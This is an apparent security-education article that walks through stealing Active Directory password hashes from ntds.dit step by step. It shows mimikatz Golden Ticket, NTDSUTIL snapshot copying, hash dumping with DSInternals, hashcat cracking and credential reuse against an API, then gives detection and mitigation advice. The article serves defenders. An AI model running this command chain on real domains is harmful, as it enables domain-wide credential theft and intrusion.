NTDS.dit Password Extraction 

Active Directory
Credential Access

All data in Active Directory is stored in the file ntds.dit (“the dit”) on every domain controller (in C:\Windows\NTDS\ by default). Attackers can use the password hashes direct from the dit to advance objectives. Cracking user passwords is beneficial even if an adversary has already obtained domain dominance, as users frequently re-use passwords across domain-joined and non-domain-joined systems and applications.

To gain access to the ntds.dit file on a domain controller, an adversary must have already gained administrator access to Active Directory. Alternatively, an adversary could compromise the enterprise backup solution responsible for backing up domain controllers and copy ntds.dit from a backup. Most organizations do not frequently rotate the krbtgt secret (see the Golden Ticket attack) so even older backups can be useful.

Threat Summary
Target:
Active Directory
ATT&CK® Tactic:
ATT&CK Technique:
Difficulty
Detection:
Medium
Mitigation:
Medium
Response:
Hard

Attack Tutorial: How NTDS.dit Password Extraction Works

STEP 1

Obtain required privileges

An adversary must possess access to a domain controller’s file system before they are able to extract ntds.dit. As this requirement makes ntds.dit extraction a late-stage attack, an adversary could use a previously compromised password hash for a domain controller’s computer account to create a Silver Ticket.
In the example below, the adversary uses mimikatz to gain access to a domain controller’s file system via a Golden Ticket.
PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"
User      : FakeUser1
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-441320023-234525631-506766575
User Id   : 0
Groups Id : *513 512 520 518 519
ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt
Service   : HOST
Target    : DC1.domain.com
Lifetime  : 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session
 
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320
 
# A new command prompt window opens
C:\Windows\System32>
STEP 2

Exfiltrate ntds.dit

With access to a domain controller’s file system, the adversary can exfiltrate ntds.dit as well as the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit.

Note that while Active Directory is running, it maintains a file system lock on the ntds.dit file, so attempts to copy it will fail. Adversaries have multiple ways to get around this constraint; in particular, they can:
  • Simply stop Active Directory (though this is likely to result in being detected).
  • Use the Volume Shadow Copy Service (VSS) to snapshot the volume and extract ntds.dit from the snapshot.
  • Use a PowerShell tool like PowerSploit’s Invoke-NinjaCopy to copy the files even though they are in use.
  • Use a built-in tool like DSDBUtil.exe or NTDSUtil.exe to create active directory installation media files.
PS> .\PSExec.exe \\dc1.domain.com cmd
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
 
DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDS
Active instance set to "NTDS".
NTDSUTIL: IFM
ifm: Create Full S:\Files
Creating snapshot...
Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit
     Target Database: S:\Files\Active Directory\ntds.dit
 
                  Defragmentation  Status (Complete)
 
          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................
 
Copying registry files...
Copying S:\Files\registry\SYSTEM
Copying S:\Files\registry\SECURITY
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.
IFM media created successfully in S:\Files
ifm: q
NTDSUTIL: q
 
DC1 > Copy S:\Files \\wks2\Share
STEP 3

Extract the password hashes

Once the adversary has exfiltrated ntds.dit and the HKLM\SYSTEM registry hive, they no longer require access to the organization’s network. An adversary interested in cracking the passwords will often want to run a brute-force attack with a computer optimized for that purpose, but first they’ll need to extract the hashes from ntds.dit. The DSInternals PowerShell module provides the Get-BootKey and Get-ADDBAccount cmdlets for this purpose.
$Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM
 
Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |
  Format-Custom -View HashcatNT | 
  Out-File C:\Hashdump.txt
 
 
PS> Get-Content C:\Hashdump.txt
 
f8ae01fc52f45dda7baf7a67721665f1
eed224b4784bb040aab50b8856fe9f02
# --- Output Truncated --- #
STEP 4

Use the password hashes to gain further objectives

The adversary can now use the password hashes in pass-the-hash attacks within the environment (perhaps as a means of persistence). More likely, they will seek to crack these passwords for use in credential stuffing attacks against non-domain joined systems. In this example, the adversary cracks the hashes to obtain plaintext passwords and uses them to authenticate to a SaaS application’s API.
PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1
Session..........: hashcat
Status...........: Running
Hash.Name........: NTLM
Hash.Target......: .\Hashdump.txt
Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)
Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
Recovered........: 1/41 (2.44%) Digests
Progress.........: 189030831226880/218340105584896 (86.58%)
Rejected.........: 0/189030831226880 (0.00%)
Restore.Point....: 793149440/916132832 (86.58%)
Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256
Candidates.#1....: TNAZRwMl -> FYNkI2Jx
Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16
 
PS> Get-Content .\cracked.txt
 
852e811a65d732c83214b4ff705d777a:F8qN47F1
 
PS>   # Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API
PS>   $Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked
PS>   $Password = "F8qN47F1" # This is the password copied from cracked.txt
PS>   $Object = New-Object -TypeName psobject
PS>   $Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username
PS>   $Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password
PS>   $url = "https://service.url/api/login"
PS>   $body = $Object | ConvertTo-Json
PS>   $Header = @{ "accept" = "text/json"}
PS>   $Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"
 
PS>   $Headers = @{ 'Authorization' = "Bearer $Response" }
PS>   $url = "https://service.url/api/DoThings"
PS>   $Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers
PS>   $Response
{ "statusCode": 200, "statusMessage": "Things Done!" }

Detect, Mitigate and Respond

Detect
Mitigate
Respond
Difficulty: Medium
Attempts to access ntds.dit can be detected using the Windows event log. Event IDs 4663 and 4656 of the Audit File System subcategory can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.
Difficulty: Medium
To mitigate the risk of password extraction from ntds.dit, use the following best practices to help ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place:
  • Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
  • Rigorously follow the clean source principle for domain controllers: All infrastructure (e.g., ESX and attached storage) on which domain controllers reside or applications that service domain controllers (such as backup solutions) run must do so at the same security level as domain controllers themselves.
  • Ensure the physical security of the domain controller machines. If physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.
Difficulty: Hard
If compromise of ntds.dit is expected, a full compromise of Active Directory must also be assumed; in particular, assume the krbtgt secret was also compromised). Take the following action:
  • Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.

Detect
Difficulty: Medium
Attempts to access ntds.dit can be detected using the Windows event log. Event IDs 4663 and 4656 of the Audit File System subcategory can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.
Mitigate
Difficulty: Medium
To mitigate the risk of password extraction from ntds.dit, use the following best practices to help ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place:
  • Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
  • Rigorously follow the clean source principle for domain controllers: All infrastructure (e.g., ESX and attached storage) on which domain controllers reside or applications that service domain controllers (such as backup solutions) run must do so at the same security level as domain controllers themselves.
  • Ensure the physical security of the domain controller machines. If physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.
Respond
Difficulty: Hard
If compromise of ntds.dit is expected, a full compromise of Active Directory must also be assumed; in particular, assume the krbtgt secret was also compromised). Take the following action:
  • Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.